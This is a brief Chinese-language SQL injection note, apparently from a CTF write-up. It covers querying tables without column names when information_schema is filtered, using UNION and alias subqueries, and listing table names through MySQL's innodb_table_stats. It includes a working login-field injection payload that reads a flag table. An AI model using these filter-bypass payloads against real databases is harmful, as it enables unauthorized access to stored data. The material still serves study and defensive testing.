0x06 无列名
适用于无法正确的查出结果,比如把information_schema给过滤了
join
联合
select * from users;
select 1,2,3 union select * from users;
列名被替换成了1,2,3,
我们再利用子查询和别名查
select `2` from (select 1,2,3 union select * from users)a;
继续加大难度,不用反引号
select b from (select 1 as a,2 as b,3 as c union select * from users)u;
同时查询多个列
select concat(b,0x7e,c) from (select 1 as a,2 as b,3 as c union select * from users)u;
已知表名为flaga
password=\&username=,username=(select a from (select 1,2 as a,6 union select * from flaga limit 1,1)u)#
成功
0x07 InnoDb引擎
也是针对or的过滤来查询表名
innodb_index_stats和innodb_table_stats表
例句,缺点就是只能查表,配合无列名查询一起食用
(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#
